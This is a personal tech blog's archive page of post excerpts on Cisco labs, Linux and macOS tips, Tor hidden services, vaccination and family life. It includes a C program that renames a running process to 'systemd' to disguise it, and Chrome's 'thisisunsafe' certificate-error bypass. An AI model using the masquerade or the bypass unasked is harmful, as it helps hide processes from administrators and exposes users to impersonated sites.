Select Get Shortcut:

Newlines in markdown

Fri, 12 Mar 2021 18:48:42 -0600

Markdown ignores newlines and concatenates short lines of text together. For instance, take the following text in a Markdown file:

The Markdown engine takes multiple lines,
which are not separated by a double space,
and concatinates them into a single line.
Placing a \ after each line, disables this
behavior so that each line is separated.

These 5 separate lines, when processed through the Markdown engine, will output a single line of text:

March 11, 2021: One Year Anniversary of the COVID-19 Pandemic

Thu, 11 Mar 2021 08:22:53 -0600

One year ago today, the World Health Organization declared COVID-19 a global pandemic. This set into motion a set of events the world has not experienced since the H1N1 flu pandemic of 1918. Since the pandemic began, 118,000,000 people contracted COVID-19 and 2,620,000 people have died globally. In my home country of the United States, 29,200,000 contracted the disease and 529,000 have died.

My sympathy goes out to all the people affected by this horrible scourge. Besides the disease itself, unemployment in the United States jumped from 3.5% to 14.8% during the peak. If you have the means and it is safe to do so, please support local businesses.

Happy Birthday Elliot!

Wed, 10 Mar 2021 20:15:57 -0600

This kid turned 15 today!

Turn c into assembly

Tue, 09 Mar 2021 14:09:27 -0600

Overview

Turn c code into assembly language with gcc.

Details

Create a hello.c file with the following contents or any other c program to convert into assembly language:

#include <stdio.h>

void main () {
	printf("Hello world!\n");
}

Generate the assembly output:

jemurray@shell:~$ gcc -S hello.c
jemurray@shell:~$ ls -al hell*
-rw-r--r-- 1 jemurray jemurray  64 Mar  9 19:59 hello.c
-rw-r--r-- 1 jemurray jemurray 438 Mar  9 19:59 hello.s

Examine the assembly code:

Create an online presentations with markdown and Remark

Mon, 08 Mar 2021 06:40:52 -0600

Overview

Create a slide show presentation written purely in markdown and displayed in a standard web browser using Remark.

By using my existing Hugo website framework, I can publish slides for public consumption:

Details

Create a folder to store presentations. For this example, I will use a directory under the Hugo framework to make the presentation publicly available:

jemurray@jasons-mbp:~/Documents/www-personal/current/jasonmurray.org $ mkdir static/presentationdev
jemurray@jasons-mbp:~/Documents/www-personal/current/jasonmurray.org $

In the newly created directory, add an index.html file with the Remark scripts to load the slide show content:

Sleeping under a log shelter

Sun, 07 Mar 2021 14:08:27 -0600

Camping Overview

Yesterday my son and I went camping with the scouts for the first time in almost 1 year. The theme for our campout is building shelters to survive in potentially cold weather. Each scout is given twine and tarps to build any style shelter they believe will keep them comfortable throughout the evening. We expected the temperatures to be in the low to mid 30’s. It didn’t disappoint, by 4AM it was 32 degrees.

First campout since covid

Sat, 06 Mar 2021 06:08:53 -0600

Before the covid-19 plague, we used to camp with the Scouts at least once a month. Since that time, my son and I have not camped together with the troop. Today is the end of our camping drought. To be “covid-safe” each family must drive their son to the camping location. Once there, we will build individual “shelters”, as if it were a “survival” situation. This lends itself well to keeping everyone spread apart at a safe distance. The adults will prepare food, wrapped in foil, then cooked directly in the fire. I feel confident the fire will kill off any covid virus.

Using iOS Shortcuts to select between audio destinations

Fri, 05 Mar 2021 09:57:27 -0600

Overview

At the end of the day, I take off my bluetooth headset and put it on the charger in the upstairs office. I usually forget to power it off, therefor it stays connected to my phone. Typically not a problem unless I want to listen to an audio book or watch a video. Not all iOS apps have a button to quickly switch between audio destinations. In these instances, I have to open the Settings -> Bluetooth -> Device -> Disconnect menu. It would be much easier if there was a button or widget to quickly switch between audio outputs.

Using BGP peer-groups on Cisco routers

Thu, 04 Mar 2021 06:02:38 -0600

Overview

BGP peer-groups consolidate common configuration items to a single statement. Eliminating the need to unnecessarily duplicate configuration on each neighbor. In the example topology below, there are 4 ibgp neighbors per router, each replicating the same two lines. By using peer-groups we eliminate 4 lines from the bgp configuration. In addition, if new lines or updates are required, a single change will update all neighbors.

ibgp full mesh between all routers:

Overview and basic configuration for the Cisco ASA running in transparent mode.

Wed, 03 Mar 2021 06:31:00 -0600

Overview

Traditionally, a firewall is a routed hop and acts as a default gateway for hosts connected to the protected networks. A transparent firewall, on the other hand, is a Layer 2 firewall that acts like a “bump in the wire,” or a “stealth firewall,” and is not seen as a routed hop to connected devices. However, security policy, NAT, and most other security functions are the same as any other firewall.

Using a bastion host with SSH

Tue, 02 Mar 2021 10:19:52 -0600

Key Points

Bastion hosts limit the attack surface of critical devices.
Use the -J option with ssh to automatically proxy connections through a bastion host: ssh -A -J bastion-host-1.example.org host-3.example.org.
Multiple host can be specified in the -J option: ssh -A -J bastion-host-1.example.org,bastion-host-2.example.org host-3.example.org

Overview

An ssh bastion host is a server that sits between the secure inside network and the insecure outside network. Connections to a host on the inside must be proxied through the bastion host, direct access is not allowed. Bastion hosts reduce the attack surface by only exposing a single host to the untrusted network. In addition, bastion hosts are hardened devices, closely monitored, regularly patched, and limit services to ssh only.

Enabling external connectivity in Cisco Modeling Labs with bridged networks running on an ESXi hypervisor

Mon, 01 Mar 2021 13:33:12 -0600

Overview

Network lab environments are usually isolated from the production networks either by air-gap or a routed bastion host with legs into both sides. Some situations require lab devices to directly access external services. In the Cisco Modeling Lab environment, this is where an external connector is used. The external connector will nat, bridge, or custom connect the lab network to the production network.

In this post, we will discuss connecting the CML environment to the production network through a bridged link. A bridged network is the equivalent of plugging a CML router directly into the same network as the CML management interface. In this example, the home network router. A csr1000v would have an IP address on the same network as my laptop, Google home, or TV.

Enable equal cost multi-path with iBGP

Sun, 28 Feb 2021 11:18:19 -0600

Overview

Two active network paths to the same destination is known as equal cost multi-path (ECMP). With two paths in the routing table, a link failure will instantly shift all traffic to the active link. In addition, traffic is load balanced over each active link, effectively doubling the bandwidth to the destination.

Internal routing protocols such as is-is, ospf, and eigrp automatically load balance multiple paths:

BGP does not load balance multiple paths without additional configuration, only one route is installed in the routing table (FIB). Additional routes are waiting in the bgp database (RIB), ready to be installed if the active path fails:

Basic BGP Cisco Lab Configuration

Sat, 27 Feb 2021 10:22:26 -0600

Overview

Building on the is-is basic lab, the next component of network routing design involves connecting one organization to another. Whereas, is-is is used to exchange infrastructure routes internally, the BGP protocol is designed to communicate routes with external entities.

This lab utilizes is-is to exchange internal point-to-point and loopback interfaces routes, ebgp to exchange external routes between organizations, and ibgp to exchange the external routes learned from ebgp to internal routers.

Basic IS-IS Level2 Only Cisco Lab Configuration

Fri, 26 Feb 2021 10:42:28 -0600

Overview

A foundational component of any large networking environment is the infrastructure routes, or said another way, the network routes that allow each router to find and communicate with one another. The most common routing protocols to distribute internal network routes are ospf, is-is, and eigrp. In this post I will use Cisco Modeling Lab to build a basic 4 router topology using is-is as the infrastructure routing protocol.

Lab Topology Diagrams

The Cisco Modeling Lab topology:

Create a network topology in Cisco Modeling Lab (CML)

Thu, 25 Feb 2021 06:21:25 -0600

Overview

Cisco Modeling Lab is a commercial network virtualization environment. All routers, switches, and security devices are licensed and included within the CML system. Refer to this post for more information and installation instructions.

In this guide, we will journey through the steps required to create and link a basic network topology with no configuration.

Details

Start with a blank canvas by clicking the Dashboard button in the upper right corner of the screen:

Display progress of data moved through a unix pipe (|) with pv

Wed, 24 Feb 2021 15:24:46 -0600

Examine the movement of data through a unix pipe (|) with the pv command. Results are displayed in time elapsed, total throughput, current Mb/s, etc.

In this example, we will take several GB of compressed log file data and process it with grep:

[jemurray@linux-host 2021-02-23]$ du -ach logfile.*
2.1G	logfile.00:00:00-01:00:00.log.gz
1.9G	logfile.01:00:00-02:00:00.log.gz
1.9G	logfile.02:00:00-03:00:00.log.gz
1.9G	logfile.03:00:00-04:00:00.log.gz
1.8G	logfile.04:00:00-05:00:00.log.gz
1.9G	logfile.05:00:00-06:00:00.log.gz
2.1G	logfile.06:00:00-07:00:00.log.gz
2.7G	logfile.07:00:00-08:00:00.log.gz
3.1G	logfile.08:00:00-09:00:00.log.gz
3.2G	logfile.09:00:00-10:00:00.log.gz
3.3G	logfile.10:00:00-11:00:00.log.gz
3.3G	logfile.11:00:00-12:00:00.log.gz
3.4G	logfile.12:00:00-13:00:00.log.gz
3.3G	logfile.13:00:00-14:00:00.log.gz
3.2G	logfile.14:00:00-15:00:00.log.gz
3.1G	logfile.15:00:00-16:00:00.log.gz
3.0G	logfile.16:00:00-17:00:00.log.gz
2.6G	logfile.17:00:00-18:00:00.log.gz
2.5G	logfile.18:00:00-19:00:00.log.gz
2.3G	logfile.19:00:00-20:00:00.log.gz
2.3G	logfile.20:00:00-21:00:00.log.gz
2.3G	logfile.21:00:00-22:00:00.log.gz
2.1G	logfile.22:00:00-23:00:00.log.gz
2.0G	logfile.23:00:00-00:00:00.log.gz
61G	total

pv outputs the total bytes, current data rate, and time elapsed:

Mapping the chain of DNS servers from root to authoritative with dig

Tue, 23 Feb 2021 15:47:43 -0600

Key Points

The Domain Name System (DNS) turns domain names (jasonmurray.org) into IP addresses (104.21.41.57)
Root name servers point to servers that resolve top level domains like .com, .net, and .org
Second level name servers point to authoritative servers that resolve the second part of the domain such as jasonmurray, example, microsoft, and apple
Authoritative name servers resolve fully qualified domains such as jasonmurray.org, example.com, and microsoft.com
dig +trace jasonmurray.org displays the entire sequence of DNS servers required to resolve a domain name from root to authoratative

Overview

The dig +trace maps out all DNS servers required to resolve a DNS domain name. Typically only necessary when troubleshooting domain resolution issues. For curious minded individuals, this tool helps to explain the role each DNS server plays in name resolution.

Make a clickable image link in vscode with the Paste Image extension

Mon, 22 Feb 2021 08:01:41 -0600

Overview

The vscode extension, Paste Image takes an image from the clipboard, inserts a markdown or asciidoc link within the document, then copies the image into the appropriate directory. The default Paste Image settings do not create a clickable link to view the original image. This may be a problem if the display source resizes the content, making it difficult to read.

Details

I use Paste Image to insert images into the markdown used to create this website. The following .vscode/settings.json lines are the stock plugin settings:

How I tune out noise and sleep through the night

Sun, 21 Feb 2021 13:20:55 -0600

The Problem

Any noise, no matter how subtle, is enough to keep me from falling asleep or jarring enough to wake me up. It’s not uncommon to wake up five or more times per evening. Once awake, the animals wrestling, bed mate snoring, neighbors running amuck, or creaky house noises keep me from the slumber my body desperately needs. On a good night, I may fall back asleep in 15 to 30 minutes. However, it’s more common for the thoughts churning around my head to keep the melatonin at bay, forcing me to lie awake for 60+ minutes.

We had family photos taken today

Sat, 20 Feb 2021 14:41:52 -0600

My wife and I have been married for 23 years, our kids have been around for 15+ years. In all this time, we’ve never had professional family photos taken. Until today, when H.WellmeierPhotography met us on one of these rare Missouri days when the air is chilly and there is snow on the ground.

Until the final proofs are in, here’s a few behind the scene photos from my cell phone:

Automatically convert binary data in the paste buffer to Base64 encoded text with iTerm2

Fri, 19 Feb 2021 13:04:28 -0600

Overview

Paste binary files from the copy-paste buffer with iterm2 using the Edit -> Paste Special -> Paste File Base64-Encoded menu.

Details

Select a file to paste on the remote server:

Log into a remote server and edit a file with vi (or your favorite editor):

jemurray@shell:~$ vi image.jpg

Binary data in the paste buffer is automatically converted to Base64 text. Paste the image with Edit -> Paste Special -> Paste File Base64-Encoded:

Second dose of the COVID-19 vaccine

Thu, 18 Feb 2021 12:36:26 -0600

February 17, 2021 at 9:40AM I received the second dose of the Pfizer-BioNTech COVID-19 vaccine. WashU and BJC performed another stellar job with vaccine distribution. Ample signs and staff welcome patients, directed us where to go, answered questions, then sent us off to the main area where shots are administered. At no point did I wait more than a few minutes or was the line longer 12 people. Total time from walk in to walk out was 30 minutes, this includes the mandatory 15 minute waiting period.

Persistent network configuration storage within Tails Linux may reveal historical location data

Wed, 17 Feb 2021 13:39:04 -0600

Overview

Enabling persistent network storage in Tails linux may reveal historical location data. Saved networks broadcast a probe packet as the operating system boots up. It is possible to passively estimate a devices previous locations using this information.

In a previous post I documented an issue where a MacBook Pro will leak the real MAC address of the laptop when booting the Tails operating system from a USB drive; Thereby defeating the MAC randomization feature of Tails during initial power up. It’s important to note, the MAC address leak is a “feature” of the macOS boot process and not the fault of Tails.

Redirecting URLs with Cloudflare Page Rules

Tue, 16 Feb 2021 09:32:08 -0600

Overview

For technical users, the Cloudflare Page Rules service offers an alternative to link shorteners such as bit.ly and Owly. All domains configured within your Cloudflare account are available to use with the Page Rule URL redirection service.

Once configured, users can redirect a URL such as: https://example.com/my-redirect to https://example-of-a-convoluted-url-that-is-difficult-to-remember.org/some-long-extension.

Details

Navigate to the Cloudflare dashboard -> Page Rules menu then select Create Page Rule:

Create the Page Rule forwarding event by filling in the following fields. In this example, I will redirect jasonmurray.org/calendar to my public Office 365 calendar:

Matching and printing regex groups in sed

Mon, 15 Feb 2021 15:19:08 -0600

Overview

A CLI one-liner using regular expressions and sed to capture a group of information and print it. I typically use python to build complex regular expression pattern matching and grouping. In this example, a simple one-liner pulls data out of a text file.

Details

The input file is a list of Markdown links:

jemurray@jasons-mbp:~ $ head -1 scratch.txt
[Schedule requirements gathering meeting for WSA](https://example.com)

The sed command pulls all the text between the square-brackets [...].

The senators who voted to acquit Donald Trump during his second impeachment trial

Sun, 14 Feb 2021 10:44:32 -0600

Overview

On January 6, 2021, President Donald Trump encouraged a mob of supporters enraged by anger and misinformation over the 2020 presidential loss to Joe Biden, to attack and breach the United States capitol. The insurrection killed 6 people and injured 140 others. This violent rejection of the democratic process rests squarely on the shoulders of the former president.

The legal defense team put together this video which highlights Donald Trumps role in this historic event.

Simulating production networks with Cisco Modeling Lab: Install Guide

Sat, 13 Feb 2021 11:41:28 -0600

Overview

Cisco Modeling Lab is a commercial network virtualization environment. All routers, switches, and security devices are licensed and included within the CML system. CML differs from other offerings such as GNS3 or Eve-NG by including legal Cisco software images and licenses as part of the purchased bundle. The software costs approximately $200 per year for the personal edition which allows up to 20 simultaneous devices.

While the minimum system requirements are 4 CPUs, 8Gb RAM, and 16Gb HD; this won’t be enough to run 20 routers at the same time. Expect to spend a few thousand dollars on hardware capable of simulating a real production network. This is not software that will run well on a typical consumer laptop.

Creating a shortcut in vscode to switch between the terminal and editor

Fri, 12 Feb 2021 12:15:31 -0600

Overview

I spend a lot of time in vscode swapping between the editor and terminal windows. To streamline the workflow and keep my hands from leaving the keyboard, I created the shortcut ctrl + ; to swap between the two windows.

Details

Open the keyboard shortcuts settings:

First, search for Terminal: Focus on Terminal View.

Caution: MAC address information leaked when booting Tails Linux on a MacBook Pro (not Tails fault)

Thu, 11 Feb 2021 12:34:47 -0600

Overview

While exploring the interworkings of the Tails MAC address randomization process, I discovered a situation where the real MAC address is leaked if Tails is booted from a USB drive on a MacBook Pro.

Details

I started off by building a Linux workstation with the wlan1 interface in monitoring mode. The wireless sniffer was setup to capture traffic from the real MAC address (ac:bc:32:b4:a9:83) of the MacBook Pro on channel 149. As a baseline, I am able to confirm traffic is received from the MacBook Pro’s en0 network adaptor while booted in macOS:

Remove files from git repository without removing local files

Wed, 10 Feb 2021 06:42:32 -0600

Overview

Running git rm <file> without the --cached option will delete files from a git repository and the local file system. To remove files from a git repository only, use the --cached command line argument.

Locate and remove a single file

Locate files to remove:

git ls-files

Output:

jemurray@jasons-mbp:~/Documents/www-personal/current/jasonmurray.org $ git ls-files
...
content/.DS_Store
...

Remove single file from the git repository without removing local file:

git rm --dry-run --cached content/.DS_Store

Output:

Using macOS 'speak selection' to help with proofreading

Tue, 09 Feb 2021 10:17:30 -0600

Overview

Before publishing a new document, I prefer to have another person read the text back to me. This helps catch errors not easily detected by my own silent proofreading. That paragraph put together in bits-and-pieces sounds good inside my head, but not so much when read out loud.

Not everyone enjoys reading the technical works of art I create. In fact, most of my immediate family members don’t care much for my writing. Finding a good assistant is hard to come by these days. This is where macOS’s accessibility option speak selection helps. I can highlight a selection of text then click option + esc and macOS will read the text to me. My laptop does not care if I ask it to read the same sentence 1 or 100 times.

Removing Disqus to enhance my readers privacy

Mon, 08 Feb 2021 11:03:17 -0600

In my haste to add user comments to this website, I did not take into account the privacy of my readers. While I believe privacy on the Internet is mostly a thing of the past, I don’t want my site to be a contributing factor its further erosion.

I stumbled across this issue while debugging a display problem. Using the Safari developer tools, we see there are 24 external requests per page load when Disqus commenting is enabled:

Using git as a historical time machine for jasonmurray.org

Sun, 07 Feb 2021 11:54:28 -0600

Overview

I enjoy watching how my online presence changes over time. To facilitate keeping this historical record, the content on jasonmurray.org is written in standard markdown and tracked with the git version control system. Until recently, I used a self-hosted git repo to keep unpublished drafts and private parts of the site from becoming public.

To simplify the management infrastructure, I moved from a self-hosted repository to one hosted at GitHub. To keep unpublished information private, a .gitignore file excludes the appropriate directories from public consumption.

Monitoring layer-1 wireless traffic with Linux

Sat, 06 Feb 2021 12:00:28 -0600

Overview

Within Linux, a wireless adaptor operates in either managed, AP, monitor, ad-hoc, WDS, or mesh mode. Managed mode enables the wireless card to connect to the network through an access point. This is the default and most common configuration for the majority of users. Monitor mode, on the other hand, allows the network adaptor to passively monitor all traffic. Using a packet capture tool such as tcpdump, we can extract and decode all wireless communication within range of the network adaptor.

After macOS upgrade, git is broken again

Fri, 05 Feb 2021 16:21:44 -0600

Overview

After the BigSur 11.2 upgrade git stopped working. This is the same problem I had upgrading from 10.14.x to 10.15.x in the past.

Details

git stopped working after the BigSur 11.2 upgrade:

jemurray@jasons-mbp:~/Documents/www-personal/current/jasonmurray.org $ git status
xcrun: error: invalid active developer path (/Library/Developer/CommandLineTools), missing xcrun at: /Library/Developer/CommandLineTools/usr/bin/xcrun

Fix the problem by running the xcode command line tool install:

jemurray@jasons-mbp:~/Documents/www-personal/current/jasonmurray.org $ xcode-select --install
xcode-select: note: install requested for command line developer tools

The command above starts the GUI install:

Change process display name

Thu, 04 Feb 2021 12:51:41 -0600

Overview

By changing the argv[0] variable (language specific), we can change the visible name of a process.

Details

The program:

#include <unistd.h>
#include <string.h>
#include <stdio.h>

int main(int argc, char *argv[]) {

    printf("pid: %i\n", getpid());

    char psname[] = "systemd";
    strncpy(argv[0],psname,strlen(argv[0]));

    sleep(300);

    return 0;
}

Compile:

gcc ./myOriginalProgramName.c -o myOriginalProgramName

Execute with the name ./myOriginalProgramName:

jemurray@home-server:~/processname$ ./myOriginalProgramName
pid: 31514

Examine the current process table, the name has been changed from myOriginalProgramName to systemd:

jemurray@home-server:~$ ps -ef | grep 31514
jemurray 31514 29114  0 13:12 pts/8    00:00:00 systemd

Help validate the safety of the COVID-19 vaccine with v-safe

Wed, 03 Feb 2021 11:57:31 -0600

Overview

On January 27, 2021 I received the first dose of the COVID vaccine. The current round of COVID-19 vaccines within the United States are released for use under the FDA Emergency Use Authorization. To help track an adverse side affects, the CDC created the v-safe symptom tracking system.

V-safe is a smartphone-based tool that checks in on you after your COVID-19 vaccination. Your participation helps keep COVID-19 vaccines safe — for you and for everyone.

Force HTTPS connections with HSTS

Tue, 02 Feb 2021 04:33:14 -0600

Overview

HTTP Strict Transport Security (HSTS) is a mechanism web servers issue to signal clients an https connection is mandatory in order to fetch content. HSTS helps to protect websites against man-in-the-middle techniques such as protocol downgrading or cookie hijacking.

The HSTS policy is communicated to clients by injecting a Strict-Transport-Security header in the http response from the web server. The header includes the minimum number of seconds the client must honor the policy.

Connecting to a Tor onion domain over SSH

Mon, 01 Feb 2021 06:00:59 -0600

Overview

In order to connect to a .onion URL or domain through SSH, the connection must be relayed through a Tor SOCKS proxy with the -o ProxyCommand option:

ssh -o ProxyCommand='nc -x 127.0.0.1:9050 %h %p' trspv4gsa5irkrflbskyzwfo6vsj5h6i6zaelgc52hxmuoz6w6xpzbid.onion

Details

First, start the tor service on the system running the ssh client:

jemurray@Jasons-MacBook-Pro:~ $ tor
Jan 30 16:03:59.884 [notice] Tor 0.4.4.6 running on Darwin with Libevent 2.1.12-stable, OpenSSL 1.1.1i, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A.
Jan 30 16:03:59.884 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jan 30 16:03:59.884 [notice] Configuration file "/usr/local/etc/tor/torrc" not present, using reasonable defaults.
Jan 30 16:03:59.886 [notice] Opening Socks listener on 127.0.0.1:9050
Jan 30 16:03:59.886 [notice] Opened Socks listener on 127.0.0.1:9050
Jan 30 16:03:59.000 [notice] Parsing GEOIP IPv4 file /usr/local/Cellar/tor/0.4.4.6/share/tor/geoip.
Jan 30 16:04:00.000 [notice] Parsing GEOIP IPv6 file /usr/local/Cellar/tor/0.4.4.6/share/tor/geoip6.
Jan 30 16:04:00.000 [notice] Bootstrapped 0% (starting): Starting
Jan 30 16:04:00.000 [notice] Starting with guard context "default"
Jan 30 16:04:01.000 [notice] Bootstrapped 5% (conn): Connecting to a relay
Jan 30 16:04:01.000 [notice] Bootstrapped 10% (conn_done): Connected to a relay
Jan 30 16:04:01.000 [notice] Bootstrapped 14% (handshake): Handshaking with a relay
Jan 30 16:04:01.000 [notice] Bootstrapped 15% (handshake_done): Handshake with a relay done
Jan 30 16:04:01.000 [notice] Bootstrapped 75% (enough_dirinfo): Loaded enough directory info to build circuits
Jan 30 16:04:01.000 [notice] Bootstrapped 90% (ap_handshake_done): Handshake finished with a relay to build circuits
Jan 30 16:04:01.000 [notice] Bootstrapped 95% (circuit_create): Establishing a Tor circuit
Jan 30 16:04:02.000 [notice] Bootstrapped 100% (done): Done

Establish an ssh session by using the -o ProxyCommand and netcat (nc):

Safari is automatically redirecting to an HTTPS site that does not exist

Sun, 31 Jan 2021 06:37:49 -0600

Overview

When I entered the URLhttp://localhost:1313 into the Safari web browser, it automatically redirected the request to https://localhost:1313. No amount of manually retyping http or cache clearing resolved the problem. After a bit of research, I determined the problem is caused by the HTTP Strict Transport Security cache. HSTS forces web browsers to only connect to a domain over the secure https protocol.

In this example http://localhost:1313 is my Hugo development server. It never used HSTS https, I am unsure why it Safari thought it was. This post details the steps necessary to clear the HSTS cache to allow unencrypted http connections again.

Embedding a task list board in a Notion page

Sat, 30 Jan 2021 06:16:37 -0600

Overview

My day starts and ends by reviewing outstanding tasks tracked in Notion. Each day is unique, requiring shuffling items between the active and later buckets. In addition, I keep a high level journal of the day’s events. Being mindful of the day helps me to prioritize the import tasks and use my time wisely.

Each of these items, tasks and journal, are tracked on their own separate page. However, I discovered a option within Notion to insert a linked database from one page into another. This post will explain how to create a linked database within Notion.

Configuring nginx to use the TOR Onion-Location header

Fri, 29 Jan 2021 04:13:37 -0600

Overview

I recently added https://jasonmurray.org/ behind the Onion Service Protocol, formally known as TOR hidden servers. As noted in the post, my objective was not to hide the server, it does have my full name in the domain name after all, but to give visitors a way to remain anonymous while browsing my site.

If a user is attached to the Tor network and their browser supports the Onion-location headers, I am able to automatically redirect any attempts to access https://jasonmurray.org/ to the corresponding .onion URL.

Install a Opencanary honeypot on Debian 10

Thu, 28 Jan 2021 06:14:11 -0600

Overview

A honeypot is a server lying in wait for rogue actors to interrogate it’s services. These servers allow a security team to detect attempts to scan for open services running within the connected network. Honeypots listen on ports which simulate commonly attacked services such as rdp, smb, ssh, etc. Under normal circumstances, these servers do not receive any connection attempts. Communication with honeypot services will generate an alert signifying a possible break-in attempt.

First dose of the COVID-19 vaccine

Wed, 27 Jan 2021 13:54:14 -0600

I am both humbled and excited to receive the first dose of the Pfizer-BioNTech COVID-19 vaccine today. Thanks to excellent preparation and planning by the Washington University in St. Louis School of Medicine and the BJC Healthcare System, the process was extremely quick and painless.

Upon arriving at the vaccination site, the medical staff greeted me, asked a few questions, then directed us to down a hallway to the next station. At this point we filled out a standard medical questionnaire asking about allergies, covid exposure, etc. Once complete, we moved into a large conference room with medical staff ready to administer the injection.

Common docker commands

Tue, 26 Jan 2021 08:35:12 -0600

Overview

As a network architect, more and more software I use on a regular basis or within my lab environment is deployed via docker. Since I don’t use docker on a daily basis, remembering the basic commands quickly falls out of my memory after after a few weeks or months pass.

This is my place to store and reference commonly used docker commands.

The Commands

Display Container / Image Information

List docker images:

KringleCon3 2020 Objective Ten Writeup: Defeat Fingerprint Sensor

Mon, 25 Jan 2021 08:34:48 -0600

KringleCon3 Overview

KringleCon is the annual Holiday Hacking Challenge put on by the SANS Institute. Players are presented with a variety of security themed objectives and CLI challenges which provide valuable hints. In addition, the KringleCon YouTube Channel provides additional training, helpful for solving obstacles within the game, as well as practical security advice outside the game.

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

KringleCon3 2020 Objective Nine Writeup: ARP Shenanigans

Sun, 24 Jan 2021 11:47:49 -0600

KringleCon3 Overview

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

KringleCon3 2020 Objective Eight Writeup: Broken Tag Generator

Sat, 23 Jan 2021 12:15:07 -0600

KringleCon3 Overview

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

KringleCon3 2020 Objective Four Writeup: Operate the Santavator

Fri, 22 Jan 2021 11:47:49 -0600

KringleCon3 Overview

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

Binden's positive example, strong leadership, and executive orders

Thu, 21 Jan 2021 10:52:11 -0600

When President Biden took office, we moved one step closer to the issues that matter most to me.

Welcome President Biden!

Wed, 20 Jan 2021 14:35:42 -0600

President Biden is a welcome change from the past fours years of the Trump administration. I am looking forward to kindness, compassion, and empathy as we travel down a new path in America!

KringleCon3 2020 Objective Three Writeup: Point-of-Sale Password Recovery

Tue, 19 Jan 2021 11:47:49 -0600

KringleCon3 Overview

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

KringleCon3 2020 Objective Two Writeup: Investigate S3 Bucket

Mon, 18 Jan 2021 11:47:49 -0600

KringleCon3 Overview

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

KringleCon3 2020 Objective One Writeup: Uncover Santa's Gift List

Sun, 17 Jan 2021 11:47:49 -0600

KringleCon3 Overview

When KringleCon is over, players publish writeups. Each player tackles the objectives in their own unique way. These writeups help us gain insight into the minds of each individual player.

SSH Escape Sequence

Sat, 16 Jan 2021 14:35:06 -0600

Overview

An escape sequence is a set of characters which signals to the application, another action will be taken. For example, sending the break sequence to a serial console, or the hangup / terminate sequence to a stuck ssh session.

To access the escape sequence in a terminal based ssh session use the ~ followed by the option. For example, ~? displays the escape sequence menu within SSH.

Details

Connect to a server through ssh:

Adding jasonmurray.org as a TOR hidden service

Fri, 15 Jan 2021 12:53:14 -0600

Overview

Installation instructions to create a TOR hidden service on a Debian 10 server. In this example, I am adding the website jasonmurray.org and accompanying ssh server as a TOR hidden service. TOR is typically used to “hide” the owners or location of a server. In this setup, I am adding my server to TOR as an alternative way to access the resources and learn something new. In other words, I am not trying to hide the server or my identity.

Octal file permissions in Linux

Thu, 14 Jan 2021 15:31:21 -0600

GNU/Linux basic file permission overview

After creating a basic text file within a the GNU/Linux operating system:

jemurray@shell:~$ touch test

You may see a set of permission that look like this:

jemurray@shell:~$ ls -al test
-rw-r--r-- 1 jemurray jemurray 40 Jan 14 21:32 test

This section of the output above describes the type of file and the permissions associated with it:

-rw-r--r--

Broken out into individual components, each section has a specific meaning:

Log ping loss over time

Wed, 13 Jan 2021 11:08:25 -0600

A one liner to output rolling ping statistics to a specific host:

jemurray@home-server:~$ while [ 1 ]; do echo -n "`date` "; ping -c 5 -i .2 shell.jasonmurray.org | grep -P '^\d.*packets'; sleep 1; done
Wed Jan 13 11:07:25 CST 2021 5 packets transmitted, 5 received, 0% packet loss, time 803ms
Wed Jan 13 11:07:27 CST 2021 5 packets transmitted, 5 received, 0% packet loss, time 802ms
Wed Jan 13 11:07:29 CST 2021 5 packets transmitted, 5 received, 0% packet loss, time 801ms

Piecing together tools like this is core to the Unix Philosopy. It is fun to see how we can extend simple commands to make something more complex.

Display images through an iTerm2 terminal session

Tue, 12 Jan 2021 16:29:28 -0600

Overview

iTerm2 can display images within a terminal session without the need for a external display program. Even over a ssh session!

Details

You must be using iTerm2.

Download imgcat:

wget https://iterm2.com/utilities/imgcat

Make imgcat executable:

chmod 755 ./imgcat

Display an image from the terminal by executing:

./imgcat Documents/jason-head.jpg

The first run will display this warning:

Successfully displaying an image from a terminal session:

This even works over an ssh session:

Scanning text off images taken with Office 365 iOS app

Mon, 11 Jan 2021 16:55:04 -0600

Overview

The Microsoft Office 365 app for iOS has a feature to import text from a photo, which is then imported into a Microsoft Word document.

Details

Scan text using Microsoft Word in the Office 365 iOS app:

Take a picture of the text to import, then crop as necessary:

Word document after the text is scanned in:

Google Chrome: thisisunsafe SSL error bypass

Sun, 10 Jan 2021 17:01:38 -0600

Overview

If Google Chrome presents an SSL error with no option to accept the risk, type thisisunsafe to bypass the error and continue loading the page.

WARNING: Make sure the risk is fully understood. Someone may be attempting to impersonate the site or steal your personal information.

Details

When Google Chrome detects an SSL condition or error they believe is unsafe for users to view, the following error is presented:

How to mount a vmdk file in Linux

Sat, 09 Jan 2021 14:29:34 -0600

Overview

vmdk’s, the underlying filesystem commonly used in vmware, can be mounted on a Linux server using the qemu utilities. In this example, I downloaded an ova, unarchived it, and retrieved the vmdk files. Once exposed, I am able to mount the filesystems embedded within the vmdk.

In this example, the ova is a virtual “appliance” which prohibits access a low level root shell. By mounting the vmdk file system directly, we can take a peek at the hidden secrets the vendor keeps under lock and key.

The Story of Al Becker, my Grandfather

Fri, 08 Jan 2021 13:31:31 -0600

Overview

While recovering data off old drives, I stumbled across this essay my grandfather wrote about his life. It was his attempt to document our family’s history going back as far as he can remember.

There was no other information included in the document. I don’t know if he wrote it or had someone else write it for him. I am am not sure when it was written. Either way, it is an interesting piece of history that was almost lost.

Using dns-sd to discovery Bonjour advertised devices on a local network

Thu, 07 Jan 2021 16:15:21 -0600

Overview

Zero-configuration networking (zeroconf) is a suite of technologies used to configure, distribute, and discover devices (ie. laptops) and services (ie. printers) on a local network. Many different protocol implementations of zeroconf exist depending on the operating system or vendor of the device. The most common implementations are Apples Bonjour and Microsofts LLMNR, both inspired by the Multicast Domain Name Service.

Discovery tools like dns-sd on macOS, allow us to find and examine devices connected to a local network.

Viewing image metadata

Wed, 06 Jan 2021 16:05:08 -0600

Overview

